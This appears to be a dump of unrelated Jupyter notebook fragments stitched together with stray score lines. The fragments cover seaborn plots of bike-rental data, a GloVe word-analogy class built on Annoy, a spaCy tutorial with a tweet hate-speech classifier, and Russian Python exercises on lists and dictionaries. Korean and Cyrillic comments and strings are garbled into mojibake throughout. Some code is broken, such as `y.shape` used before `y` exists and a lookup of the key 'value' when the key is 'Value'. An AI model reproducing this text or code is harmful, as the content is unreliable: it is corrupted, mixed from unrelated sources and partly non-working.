# 3-2 : 1ํ์ ์์นํ ์๋ธํ๋กฏ๋ค์ x์ถ ๋ผ๋ฒจ 90๋ ํ์
axes[1, 0].tick_params(axis='x', labelrotation=90)
axes[1, 1].tick_params(axis='x', labelrotation=90)
# ์คํ
1 : mํ n์ด Figure ์ค๋น
figure, axes = plt.subplots(nrows=2, ncols=2) # 2ํ 2์ด
plt.tight_layout()
figure.set_size_inches(10, 10)
# ์คํ
2 : ์๋ธํ๋กฏ ํ ๋น
# ๊ณ์ , ๋ ์จ, ๊ณตํด์ผ, ๊ทผ๋ฌด์ผ๋ณ ๋์ฌ ์๋ ๋ฐ์คํ๋กฏ
sns.boxplot(x='season', y='count', data=train, ax=axes[0, 0])
sns.boxplot(x='weather', y='count', data=train, ax=axes[0, 1])
sns.boxplot(x='holiday', y='count', data=train, ax=axes[1, 0])
sns.boxplot(x='workingday', y='count', data=train, ax=axes[1, 1])
# ์คํ
3 : ์ธ๋ถ ์ค์
# 3-1 : ์๋ธํ๋กฏ์ ์ ๋ชฉ ๋ฌ๊ธฐ
axes[0, 0].set(title='Box Plot On Count Across Season')
axes[0, 1].set(title='Box Plot On Count Across Weather')
axes[1, 0].set(title='Box Plot On Count Across Holiday')
axes[1, 1].set(title='Box Plot On Count Across Working Day')
# 3-2 : x์ถ ๋ผ๋ฒจ ๊ฒน์นจ ํด๊ฒฐ
axes[0, 1].tick_params('x', labelrotation=10) # 10๋ ํ์
# ์คํ
1 : mํ n์ด Figure ์ค๋น
mpl.rc('font', size=11)
figure, axes = plt.subplots(nrows=5) # 5ํ 1์ด
figure.set_size_inches(12, 18)
# ์คํ
2 : ์๋ธํ๋กฏ ํ ๋น
# ๊ทผ๋ฌด์ผ, ๊ณตํด์ผ, ์์ผ, ๊ณ์ , ๋ ์จ์ ๋ฐ๋ฅธ ์๊ฐ๋๋ณ ํ๊ท ๋์ฌ ์๋ ํฌ์ธํธํ๋กฏ
sns.pointplot(x='hour', y='count', data=train, hue='workingday', ax=axes[0])
sns.pointplot(x='hour', y='count', data=train, hue='holiday', ax=axes[1])
sns.pointplot(x='hour', y='count', data=train, hue='weekday', ax=axes[2])
sns.pointplot(x='hour', y='count', data=train, hue='season', ax=axes[3])
sns.pointplot(x='hour', y='count', data=train, hue='weather', ax=axes[4]);
# ์คํ
1 : mํ n์ด Figure ์ค๋น
mpl.rc('font', size=15)
figure, axes = plt.subplots(nrows=2, ncols=2) # 2ํ 2์ด
plt.tight_layout()
figure.set_size_inches(7, 6)
# ์คํ
2 : ์๋ธํ๋กฏ ํ ๋น
# ์จ๋, ์ฒด๊ฐ ์จ๋, ํ์, ์ต๋ ๋ณ ๋์ฌ ์๋ ์ฐ์ ๋ ๊ทธ๋ํ
sns.regplot(x='temp', y='count', data=train, ax=axes[0, 0],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'})
sns.regplot(x='atemp', y='count', data=train, ax=axes[0, 1],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'})
sns.regplot(x='windspeed', y='count', data=train, ax=axes[1, 0],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'})
sns.regplot(x='humidity', y='count', data=train, ax=axes[1, 1],
scatter_kws={'alpha': 0.2}, line_kws={'color': 'blue'});
train[['temp', 'atemp', 'humidity', 'windspeed', 'count']].corr()
# ํผ์ฒ ๊ฐ ์๊ด๊ด๊ณ ๋งคํธ๋ฆญ์ค
corrMat = train[['temp', 'atemp', 'humidity', 'windspeed', 'count']].corr()
fig, ax= plt.subplots()
fig.set_size_inches(10, 10)
sns.heatmap(corrMat, annot=True) # ์๊ด๊ด๊ณ ํํธ๋งต ๊ทธ๋ฆฌ๊ธฐ
ax.set(title='Heatmap of Numerical Data');
| 0.294114 | 0.916633 |
*์๋ ๋งํฌ๋ฅผ ํตํด ์ด ๋
ธํธ๋ถ์ ์ฃผํผํฐ ๋
ธํธ๋ถ ๋ทฐ์ด(nbviewer.jupyter.org)๋ก ๋ณด๊ฑฐ๋ ๊ตฌ๊ธ ์ฝ๋ฉ(colab.research.google.com)์์ ์คํํ ์ ์์ต๋๋ค.*
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://nbviewer.jupyter.org/github/rickiepark/nlp-with-pytorch/blob/master/chapter_5/5_1_Pretrained_Embeddings.ipynb"><img src="https://jupyter.org/assets/main-logo.svg" width="28" />์ฃผํผํฐ ๋
ธํธ๋ถ ๋ทฐ์ด๋ก ๋ณด๊ธฐ</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/rickiepark/nlp-with-pytorch/blob/master/chapter_5/5_1_Pretrained_Embeddings.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />๊ตฌ๊ธ ์ฝ๋ฉ(Colab)์์ ์คํํ๊ธฐ</a>
</td>
</table>
```
# annoy ํจํค์ง๋ฅผ ์ค์นํฉ๋๋ค.
!pip install annoy
import torch
import torch.nn as nn
from tqdm import tqdm
from annoy import AnnoyIndex
import numpy as np
class PreTrainedEmbeddings(object):
""" ์ฌ์ ํ๋ จ๋ ๋จ์ด ๋ฒกํฐ ์ฌ์ฉ์ ์ํ ๋ํผ ํด๋์ค """
def __init__(self, word_to_index, word_vectors):
"""
๋งค๊ฐ๋ณ์:
word_to_index (dict): ๋จ์ด์์ ์ ์๋ก ๋งคํ
word_vectors (numpy ๋ฐฐ์ด์ ๋ฆฌ์คํธ)
"""
self.word_to_index = word_to_index
self.word_vectors = word_vectors
self.index_to_word = {v: k for k, v in self.word_to_index.items()}
self.index = AnnoyIndex(len(word_vectors[0]), metric='euclidean')
print("์ธ๋ฑ์ค ๋ง๋๋ ์ค!")
for _, i in self.word_to_index.items():
self.index.add_item(i, self.word_vectors[i])
self.index.build(50)
print("์๋ฃ!")
@classmethod
def from_embeddings_file(cls, embedding_file):
"""์ฌ์ ํ๋ จ๋ ๋ฒกํฐ ํ์ผ์์ ๊ฐ์ฒด๋ฅผ ๋ง๋ญ๋๋ค.
๋ฒกํฐ ํ์ผ์ ๋ค์๊ณผ ๊ฐ์ ํฌ๋งท์
๋๋ค:
word0 x0_0 x0_1 x0_2 x0_3 ... x0_N
word1 x1_0 x1_1 x1_2 x1_3 ... x1_N
๋งค๊ฐ๋ณ์:
embedding_file (str): ํ์ผ ์์น
๋ฐํ๊ฐ:
PretrainedEmbeddings์ ์ธ์คํด์ค
"""
word_to_index = {}
word_vectors = []
with open(embedding_file) as fp:
for line in fp.readlines():
line = line.split(" ")
word = line[0]
vec = np.array([float(x) for x in line[1:]])
word_to_index[word] = len(word_to_index)
word_vectors.append(vec)
return cls(word_to_index, word_vectors)
def get_embedding(self, word):
"""
๋งค๊ฐ๋ณ์:
word (str)
๋ฐํ๊ฐ
์๋ฒ ๋ฉ (numpy.ndarray)
"""
return self.word_vectors[self.word_to_index[word]]
def get_closest_to_vector(self, vector, n=1):
"""๋ฒกํฐ๊ฐ ์ฃผ์ด์ง๋ฉด n ๊ฐ์ ์ต๊ทผ์ ์ด์์ ๋ฐํํฉ๋๋ค
๋งค๊ฐ๋ณ์:
vector (np.ndarray): Annoy ์ธ๋ฑ์ค์ ์๋ ๋ฒกํฐ์ ํฌ๊ธฐ์ ๊ฐ์์ผ ํฉ๋๋ค
n (int): ๋ฐํ๋ ์ด์์ ๊ฐ์
๋ฐํ๊ฐ:
[str, str, ...]: ์ฃผ์ด์ง ๋ฒกํฐ์ ๊ฐ์ฅ ๊ฐ๊น์ด ๋จ์ด
๋จ์ด๋ ๊ฑฐ๋ฆฌ์์ผ๋ก ์ ๋ ฌ๋์ด ์์ง ์์ต๋๋ค.
"""
nn_indices = self.index.get_nns_by_vector(vector, n)
return [self.index_to_word[neighbor] for neighbor in nn_indices]
def compute_and_print_analogy(self, word1, word2, word3):
"""๋จ์ด ์๋ฒ ๋ฉ์ ์ฌ์ฉํ ์ ์ถ ๊ฒฐ๊ณผ๋ฅผ ์ถ๋ ฅํฉ๋๋ค
word1์ด word2์ผ ๋ word3์ __์
๋๋ค.
์ด ๋ฉ์๋๋ word1 : word2 :: word3 : word4๋ฅผ ์ถ๋ ฅํฉ๋๋ค
๋งค๊ฐ๋ณ์:
word1 (str)
word2 (str)
word3 (str)
"""
vec1 = self.get_embedding(word1)
vec2 = self.get_embedding(word2)
vec3 = self.get_embedding(word3)
# ๋ค ๋ฒ์งธ ๋จ์ด ์๋ฒ ๋ฉ์ ๊ณ์ฐํฉ๋๋ค
spatial_relationship = vec2 - vec1
vec4 = vec3 + spatial_relationship
closest_words = self.get_closest_to_vector(vec4, n=4)
existing_words = set([word1, word2, word3])
closest_words = [word for word in closest_words
if word not in existing_words]
if len(closest_words) == 0:
print("๊ณ์ฐ๋ ๋ฒกํฐ์ ๊ฐ์ฅ ๊ฐ๊น์ด ์ด์์ ์ฐพ์ ์ ์์ต๋๋ค!")
return
for word4 in closest_words:
print("{} : {} :: {} : {}".format(word1, word2, word3, word4))
# GloVe ๋ฐ์ดํฐ๋ฅผ ๋ค์ด๋ก๋ํฉ๋๋ค.
!wget http://nlp.stanford.edu/data/glove.6B.zip
!unzip glove.6B.zip
!mkdir -p data/glove
!mv glove.6B.100d.txt data/glove
embeddings = PreTrainedEmbeddings.from_embeddings_file('data/glove/glove.6B.100d.txt')
embeddings.compute_and_print_analogy('man', 'he', 'woman')
embeddings.compute_and_print_analogy('fly', 'plane', 'sail')
embeddings.compute_and_print_analogy('cat', 'kitten', 'dog')
embeddings.compute_and_print_analogy('blue', 'color', 'dog')
embeddings.compute_and_print_analogy('leg', 'legs', 'hand')
embeddings.compute_and_print_analogy('toe', 'foot', 'finger')
embeddings.compute_and_print_analogy('talk', 'communicate', 'read')
embeddings.compute_and_print_analogy('blue', 'democrat', 'red')
embeddings.compute_and_print_analogy('man', 'king', 'woman')
embeddings.compute_and_print_analogy('man', 'doctor', 'woman')
embeddings.compute_and_print_analogy('fast', 'fastest', 'small')
```
|
github_jupyter
|
# annoy ํจํค์ง๋ฅผ ์ค์นํฉ๋๋ค.
!pip install annoy
import torch
import torch.nn as nn
from tqdm import tqdm
from annoy import AnnoyIndex
import numpy as np
class PreTrainedEmbeddings(object):
""" ์ฌ์ ํ๋ จ๋ ๋จ์ด ๋ฒกํฐ ์ฌ์ฉ์ ์ํ ๋ํผ ํด๋์ค """
def __init__(self, word_to_index, word_vectors):
"""
๋งค๊ฐ๋ณ์:
word_to_index (dict): ๋จ์ด์์ ์ ์๋ก ๋งคํ
word_vectors (numpy ๋ฐฐ์ด์ ๋ฆฌ์คํธ)
"""
self.word_to_index = word_to_index
self.word_vectors = word_vectors
self.index_to_word = {v: k for k, v in self.word_to_index.items()}
self.index = AnnoyIndex(len(word_vectors[0]), metric='euclidean')
print("์ธ๋ฑ์ค ๋ง๋๋ ์ค!")
for _, i in self.word_to_index.items():
self.index.add_item(i, self.word_vectors[i])
self.index.build(50)
print("์๋ฃ!")
@classmethod
def from_embeddings_file(cls, embedding_file):
"""์ฌ์ ํ๋ จ๋ ๋ฒกํฐ ํ์ผ์์ ๊ฐ์ฒด๋ฅผ ๋ง๋ญ๋๋ค.
๋ฒกํฐ ํ์ผ์ ๋ค์๊ณผ ๊ฐ์ ํฌ๋งท์
๋๋ค:
word0 x0_0 x0_1 x0_2 x0_3 ... x0_N
word1 x1_0 x1_1 x1_2 x1_3 ... x1_N
๋งค๊ฐ๋ณ์:
embedding_file (str): ํ์ผ ์์น
๋ฐํ๊ฐ:
PretrainedEmbeddings์ ์ธ์คํด์ค
"""
word_to_index = {}
word_vectors = []
with open(embedding_file) as fp:
for line in fp.readlines():
line = line.split(" ")
word = line[0]
vec = np.array([float(x) for x in line[1:]])
word_to_index[word] = len(word_to_index)
word_vectors.append(vec)
return cls(word_to_index, word_vectors)
def get_embedding(self, word):
"""
๋งค๊ฐ๋ณ์:
word (str)
๋ฐํ๊ฐ
์๋ฒ ๋ฉ (numpy.ndarray)
"""
return self.word_vectors[self.word_to_index[word]]
def get_closest_to_vector(self, vector, n=1):
"""๋ฒกํฐ๊ฐ ์ฃผ์ด์ง๋ฉด n ๊ฐ์ ์ต๊ทผ์ ์ด์์ ๋ฐํํฉ๋๋ค
๋งค๊ฐ๋ณ์:
vector (np.ndarray): Annoy ์ธ๋ฑ์ค์ ์๋ ๋ฒกํฐ์ ํฌ๊ธฐ์ ๊ฐ์์ผ ํฉ๋๋ค
n (int): ๋ฐํ๋ ์ด์์ ๊ฐ์
๋ฐํ๊ฐ:
[str, str, ...]: ์ฃผ์ด์ง ๋ฒกํฐ์ ๊ฐ์ฅ ๊ฐ๊น์ด ๋จ์ด
๋จ์ด๋ ๊ฑฐ๋ฆฌ์์ผ๋ก ์ ๋ ฌ๋์ด ์์ง ์์ต๋๋ค.
"""
nn_indices = self.index.get_nns_by_vector(vector, n)
return [self.index_to_word[neighbor] for neighbor in nn_indices]
def compute_and_print_analogy(self, word1, word2, word3):
"""๋จ์ด ์๋ฒ ๋ฉ์ ์ฌ์ฉํ ์ ์ถ ๊ฒฐ๊ณผ๋ฅผ ์ถ๋ ฅํฉ๋๋ค
word1์ด word2์ผ ๋ word3์ __์
๋๋ค.
์ด ๋ฉ์๋๋ word1 : word2 :: word3 : word4๋ฅผ ์ถ๋ ฅํฉ๋๋ค
๋งค๊ฐ๋ณ์:
word1 (str)
word2 (str)
word3 (str)
"""
vec1 = self.get_embedding(word1)
vec2 = self.get_embedding(word2)
vec3 = self.get_embedding(word3)
# ๋ค ๋ฒ์งธ ๋จ์ด ์๋ฒ ๋ฉ์ ๊ณ์ฐํฉ๋๋ค
spatial_relationship = vec2 - vec1
vec4 = vec3 + spatial_relationship
closest_words = self.get_closest_to_vector(vec4, n=4)
existing_words = set([word1, word2, word3])
closest_words = [word for word in closest_words
if word not in existing_words]
if len(closest_words) == 0:
print("๊ณ์ฐ๋ ๋ฒกํฐ์ ๊ฐ์ฅ ๊ฐ๊น์ด ์ด์์ ์ฐพ์ ์ ์์ต๋๋ค!")
return
for word4 in closest_words:
print("{} : {} :: {} : {}".format(word1, word2, word3, word4))
# GloVe ๋ฐ์ดํฐ๋ฅผ ๋ค์ด๋ก๋ํฉ๋๋ค.
!wget http://nlp.stanford.edu/data/glove.6B.zip
!unzip glove.6B.zip
!mkdir -p data/glove
!mv glove.6B.100d.txt data/glove
embeddings = PreTrainedEmbeddings.from_embeddings_file('data/glove/glove.6B.100d.txt')
embeddings.compute_and_print_analogy('man', 'he', 'woman')
embeddings.compute_and_print_analogy('fly', 'plane', 'sail')
embeddings.compute_and_print_analogy('cat', 'kitten', 'dog')
embeddings.compute_and_print_analogy('blue', 'color', 'dog')
embeddings.compute_and_print_analogy('leg', 'legs', 'hand')
embeddings.compute_and_print_analogy('toe', 'foot', 'finger')
embeddings.compute_and_print_analogy('talk', 'communicate', 'read')
embeddings.compute_and_print_analogy('blue', 'democrat', 'red')
embeddings.compute_and_print_analogy('man', 'king', 'woman')
embeddings.compute_and_print_analogy('man', 'doctor', 'woman')
embeddings.compute_and_print_analogy('fast', 'fastest', 'small')
| 0.543106 | 0.89317 |
```
!conda info
conda install -c conda-forge spacy
!python -m spacy download en_core_web_sm
```
## Word tokenization
```
# Word tokenization
from spacy.lang.en import English
# Load English tokenizer, tagger, parser, NER and word vectors
nlp = English()
text = """When learning data science, you shouldn't get discouraged!
Challenges and setbacks aren't failures, they're just part of the journey. You've got this!"""
# "nlp" Object is used to create documents with linguistic annotations.
my_doc = nlp(text)
# Create list of word tokens
token_list = []
for token in my_doc:
token_list.append(token.text)
print(token_list)
```
### Sentence Classification
```
# sentence tokenization
# Load English tokenizer, tagger, parser, NER and word vectors
nlp = English()
# Create the pipeline 'sentencizer' component
sbd = nlp.create_pipe('sentencizer')
# Add the component to the pipeline
nlp.add_pipe(sbd)
text = """When learning data science, you shouldn't get discouraged!
Challenges and setbacks aren't failures, they're just part of the journey. You've got this!"""
# "nlp" Object is used to create documents with linguistic annotations.
doc = nlp(text)
# create list of sentence tokens
sents_list = []
for sent in doc.sents:
sents_list.append(sent.text)
print(sents_list)
```
### Stop word removal
```
#Stop words
#importing stop words from English language.
import spacy
spacy_stopwords = spacy.lang.en.stop_words.STOP_WORDS
#Printing the total number of stop words:
print('Number of stop words: %d' % len(spacy_stopwords))
#Printing first ten stop words:
print('First ten stop words: %s' % list(spacy_stopwords)[:20])
from spacy.lang.en.stop_words import STOP_WORDS
#Implementation of stop words:
filtered_sent=[]
# "nlp" Object is used to create documents with linguistic annotations.
doc = nlp(text)
# filtering stop words
for word in doc:
if word.is_stop==False:
filtered_sent.append(word)
print("Filtered Sentence:",filtered_sent)
```
### Lemmatization
```
# Implementing lemmatization
lem = nlp("run runs running runner")
# finding lemma for each word
for word in lem:
print(word.text,word.lemma_)
```
### Part of Speech Tagging
```
# POS tagging
# importing the model en_core_web_sm of English for vocabluary, syntax & entities
import en_core_web_sm
# load en_core_web_sm of English for vocabluary, syntax & entities
nlp = en_core_web_sm.load()
# "nlp" Objectis used to create documents with linguistic annotations.
docs = nlp(u"All is well that ends well.")
for word in docs:
print(word.text,word.pos_)
```
# Twitter hate speech modeling
```
!conda install -c anaconda nltk -y
import pandas as pd
import re
data = pd.read_csv("/Users/manishanker.talusani/Downloads/twitter-sentiment-analysis-hatred-speech/train.csv")
tweets = data.tweet[:100]
tweets.head().tolist()
""" Cleaning Tweets """
tweets = tweets.str.lower()# removing special characters and numbers
tweets = tweets.apply(lambda x : re.sub("[^a-z\s]","",x) )# removing stopwords
from nltk.corpus import stopwords
stopwords = set(stopwords.words("english"))
tweets = tweets.apply(lambda x : " ".join(word for word in x.split() if word not in stopwords ))
tweets.head().tolist()
import spacy
import en_core_web_sm
import numpy as np
nlp = en_core_web_sm.load()
document = nlp(tweets[0])
print("Document : ",document)
print("Tokens : ")
for token in document:
print(token.text)
```
## get word vectors out of word from spacy
```
document = nlp(tweets[0])
print(document)
for token in document:
print(token.text, token.vector.shape)
```
### โtoken.vector โ creates a vector of size (96,). The above code was to get vector out of every single word, of a single sentence/document.
```
document = nlp.pipe(tweets)
tweets_vector = np.array([tweet.vector for tweet in document])
print(tweets_vector.shape)
```
## Take the complete dataset and apply Logistic regression
```
tweets = data.tweet
document = nlp.pipe(tweets)
tweets_vector = np.array([tweet.vector for tweet in document])
print(tweets_vector.shape)
y.shape
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
X = tweets_vector
y = data["label"]
X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y, test_size=0.3, random_state=0)
model = LogisticRegression(C=0.1)
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
print("Accuracy on test data is : %0.2f" %(accuracy_score(y_test, y_pred)*100))
y_train_pred = model.predict(X_train)
print("Accuracy on train data is : %0.2f" %(accuracy_score(y_train, y_train_pred)*100))
```
|
github_jupyter
|
!conda info
conda install -c conda-forge spacy
!python -m spacy download en_core_web_sm
# Word tokenization
from spacy.lang.en import English
# Load English tokenizer, tagger, parser, NER and word vectors
nlp = English()
text = """When learning data science, you shouldn't get discouraged!
Challenges and setbacks aren't failures, they're just part of the journey. You've got this!"""
# "nlp" Object is used to create documents with linguistic annotations.
my_doc = nlp(text)
# Create list of word tokens
token_list = []
for token in my_doc:
token_list.append(token.text)
print(token_list)
# sentence tokenization
# Load English tokenizer, tagger, parser, NER and word vectors
nlp = English()
# Create the pipeline 'sentencizer' component
sbd = nlp.create_pipe('sentencizer')
# Add the component to the pipeline
nlp.add_pipe(sbd)
text = """When learning data science, you shouldn't get discouraged!
Challenges and setbacks aren't failures, they're just part of the journey. You've got this!"""
# "nlp" Object is used to create documents with linguistic annotations.
doc = nlp(text)
# create list of sentence tokens
sents_list = []
for sent in doc.sents:
sents_list.append(sent.text)
print(sents_list)
#Stop words
#importing stop words from English language.
import spacy
spacy_stopwords = spacy.lang.en.stop_words.STOP_WORDS
#Printing the total number of stop words:
print('Number of stop words: %d' % len(spacy_stopwords))
#Printing first ten stop words:
print('First ten stop words: %s' % list(spacy_stopwords)[:20])
from spacy.lang.en.stop_words import STOP_WORDS
#Implementation of stop words:
filtered_sent=[]
# "nlp" Object is used to create documents with linguistic annotations.
doc = nlp(text)
# filtering stop words
for word in doc:
if word.is_stop==False:
filtered_sent.append(word)
print("Filtered Sentence:",filtered_sent)
# Implementing lemmatization
lem = nlp("run runs running runner")
# finding lemma for each word
for word in lem:
print(word.text,word.lemma_)
# POS tagging
# importing the model en_core_web_sm of English for vocabluary, syntax & entities
import en_core_web_sm
# load en_core_web_sm of English for vocabluary, syntax & entities
nlp = en_core_web_sm.load()
# "nlp" Objectis used to create documents with linguistic annotations.
docs = nlp(u"All is well that ends well.")
for word in docs:
print(word.text,word.pos_)
!conda install -c anaconda nltk -y
import pandas as pd
import re
data = pd.read_csv("/Users/manishanker.talusani/Downloads/twitter-sentiment-analysis-hatred-speech/train.csv")
tweets = data.tweet[:100]
tweets.head().tolist()
""" Cleaning Tweets """
tweets = tweets.str.lower()# removing special characters and numbers
tweets = tweets.apply(lambda x : re.sub("[^a-z\s]","",x) )# removing stopwords
from nltk.corpus import stopwords
stopwords = set(stopwords.words("english"))
tweets = tweets.apply(lambda x : " ".join(word for word in x.split() if word not in stopwords ))
tweets.head().tolist()
import spacy
import en_core_web_sm
import numpy as np
nlp = en_core_web_sm.load()
document = nlp(tweets[0])
print("Document : ",document)
print("Tokens : ")
for token in document:
print(token.text)
document = nlp(tweets[0])
print(document)
for token in document:
print(token.text, token.vector.shape)
document = nlp.pipe(tweets)
tweets_vector = np.array([tweet.vector for tweet in document])
print(tweets_vector.shape)
tweets = data.tweet
document = nlp.pipe(tweets)
tweets_vector = np.array([tweet.vector for tweet in document])
print(tweets_vector.shape)
y.shape
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
X = tweets_vector
y = data["label"]
X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y, test_size=0.3, random_state=0)
model = LogisticRegression(C=0.1)
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
print("Accuracy on test data is : %0.2f" %(accuracy_score(y_test, y_pred)*100))
y_train_pred = model.predict(X_train)
print("Accuracy on train data is : %0.2f" %(accuracy_score(y_train, y_train_pred)*100))
| 0.674265 | 0.675809 |
```
powers = [x**y for x in range(1, 10) for y in [2,10]]
print(powers)
numbers = [x*y for x in range(1, 10) for y in [3, 5, 7]]
print(numbers)
draw_dict = {
'ะ ะพััะธั': 'A',
'ะะพัััะณะฐะปะธั': 'B',
'ะคัะฐะฝัะธั': 'C',
'ะะฐะฝะธั': 'C',
'ะะณะธะฟะตั': 'A'
}
for country, group in draw_dict.items():
print(country, group)
draw_dict = {
'ะ ะพััะธั': 'A',
'ะะพัััะณะฐะปะธั': 'B',
'ะคัะฐะฝัะธั': 'C',
'ะะฐะฝะธั': 'C',
'ะะณะธะฟะตั': 'A'
}
draw_new = {}
for country, group in draw_dict.items():
if group == 'A':
draw_new.setdefault (country, group)
print(draw_new)
2504+4994+6343
csv_file = [
['100412', 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 9],
['100728', 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 32],
['100732', 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 11],
['100803', 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 20],
['100898', 'ะจะฐะณะพะผะตั Omron HJA-306', 2],
['100934', 'ะัะปััะพะผะตัั Beurer PM62', 17],
]
print(csv_file[4])
csv_file = [
['100412', 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 9],
['100728', 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 32],
['100732', 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 11],
['100803', 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 20],
['100898', 'ะจะฐะณะพะผะตั Omron HJA-306', 2],
['100934', 'ะัะปััะพะผะตัั Beurer PM62', 17],
]
pulsometer_id = csv_file[4][2]
for record in csv_file:
if record[1] == 'ะจะฐะณะพะผะตั Omron HJA-306':
print('ะะพะปะธัะตััะฒะพ ัะฐะณะพะผะตัะพะฒ ะฝะฐ ัะบะปะฐะดะต - {}ัั'.format(record[2]))
csv_file = [
['100412', 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 9],
['100728', 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 32],
['100732', 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 11],
['100803', 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 20],
['100898', 'ะจะฐะณะพะผะตั Omron HJA-306', 2],
['100934', 'ะัะปััะพะผะตัั Beurer PM62', 17],
]
csv_file_filtered = []
for item in csv_file:
if item[2] >10:
csv_file_filtered.append(item)
print(csv_file_filtered)
contacts = {
'ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั': {
'tel': '5387',
'position': 'ะผะตะฝะตะดะถะตั'
},
'ะกะพะผะพะฒะฐ ะะฐัะฐะปัั': {
'tel': '5443',
'position': 'ัะฐะทัะฐะฑะพััะธะบ'
},
}
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั'])
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั']['tel'])
print(contacts['ะะพัะธัะบะธะฝ ะะปะฐะดะธะผะธั']['position'])
print(contacts.keys())
csv_dict = [
{'id': '100412', 'position': 'ะะพัะธะฝะบะธ ะดะปั ะณะพัะฝัั
ะปัะถ ATOMIC Hawx Prime 100', 'count': 9},
{'id': '100728', 'position': 'ะกะบะตะนัะฑะพัะด Jdbug RT03', 'count': 32},
{'id': '100732', 'position': 'ะ ะพะปะปะตััะตัั Razor RipStik Bright', 'count': 11},
{'id': '100803', 'position': 'ะะพัะธะฝะบะธ ะดะปั ัะฝะพัะฑะพัะดะฐ DC Tucknee', 'count': 20},
{'id': '100898', 'position': 'ะจะฐะณะพะผะตั Omron HJA-306', 'count': 2},
{'id': '100934', 'position': 'ะัะปััะพะผะตัั Beurer PM62', 'count': 17},
]
csv_dict_boots = []
for item in csv_dict:
if 'ะะพัะธะฝะบะธ' in item ['position']:
csv_dict_boots.append(item)
print(csv_dict_boots)
results = [
{'cost': 98, 'source': 'vk'},
{'cost': 153, 'source': 'yandex'},
{'cost': 110, 'source': 'facebook'},
]
min = 1000
for result in results:
if result ['cost'] < min:
min = result['cost']
print(min)
defect_stats = [
{'step number': 1, 'damage': 0.98},
{'step number': 2, 'damage': 0.99},
{'step number': 3, 'damage': 0.99},
{'step number': 4, 'damage': 0.96},
{'step number': 5, 'damage': 0.97},
{'step number': 6, 'damage': 0.97},
]
size=100 # ะธัั
ะพะดะฝัะน ัะฐะทะผะตั 100% ั ะพัะบะปะพะฝะตะฝะธะตะผ 0%\n",
number=0 # ััะฐะฟ ะฟัะพะธะทะฒะพะดััะฒะตะฝะฝะพะน ะปะธะฝะธะธ\n",
for step in defect_stats: #ะัะพั
ะพะดะธะผัั ะฟะพ ะบะฐะถะดะพะผั ะธะท ัะปะพะฒะฐัะตะน ัะฟะธัะบะฐ\n",
size*=step['damage'] # ะฃะผะตะฝััะฐะตะผ ะธัั
ะพะดะฝัะน ัะฐะทะผะตั ะฝะฐ ะฒะตะปะธัะธะฝั ะดะตัะพัะผะฐัะธะธ (ัะผะฝะพะถะฐะตะผ ะฝะฐ ะทะฝะฐัะตะฝะธะต ะบะปััะฐ damage)\n",
if size<90: # ะัะปะธ ะฟะพะปััะธะฒัะธะตัั ะฟะพะฒัะตะถะดะตะฝะธั ะฟัะธะฒะตะปะธ ะบ ัะฐะทะผะตัั ะผะตะฝะตะต 90%\n",
number=step['step number'] # ะะฟัะตะดะตะปัะตะผ ััะฐะฟ, ะฝะฐ ะบะพัะพัะพะผ ััะพ ะฟัะพะธะทะพัะปะพ
break
print(number)
currency = {
'AMD': {
'Name': 'ะัะผัะฝัะบะธั
ะดัะฐะผะพะฒ',
'Nominal': 100,
'Value': 13.121
},
'AUD': {
'Name': 'ะะฒัััะฐะปะธะนัะบะธะน ะดะพะปะปะฐั',
'Nominal': 1,
'Value': 45.5309
},
'INR': {
'Name': 'ะะฝะดะธะนัะบะธั
ััะฟะธะน',
'Nominal': 100,
'Value': 92.9658
},
'MDL': {
'Name': 'ะะพะปะดะฐะฒัะบะธั
ะปะตะตะฒ',
'Nominal': 10,
'Value': 36.9305
},
}
min = 10000
valuta = ''
for n, v in currency.items():
if v['value']/v['Nominal'] < min:
min = v['value']/v['Nominal']
valuta = n
print(valuta)
currency = {
'AMD': {
'Name': 'ะัะผัะฝัะบะธั
ะดัะฐะผะพะฒ',
'Nominal': 100,
'Value': 13.121
},
'AUD': {
'Name': 'ะะฒัััะฐะปะธะนัะบะธะน ะดะพะปะปะฐั',
'Nominal': 1,
'Value': 45.5309
},
'INR': {
'Name': 'ะะฝะดะธะนัะบะธั
ััะฟะธะน',
'Nominal': 100,
'Value': 92.9658
},
'MDL': {
'Name': 'ะะพะปะดะฐะฒัะบะธั
ะปะตะตะฒ',
'Nominal': 10,
'Value': 36.9305
}
}
min = 100000
valuta = ""
for exchange, rate in currency.items(): # ะัะพั
ะพะดะธะผัั ะฟะพ ะบะฐะถะดะพะผั ัะปะตะผะตะฝัั ะฒะปะพะถะตะฝะฝะพะณะพ ัะปะพะฒะฐัั currency\n",
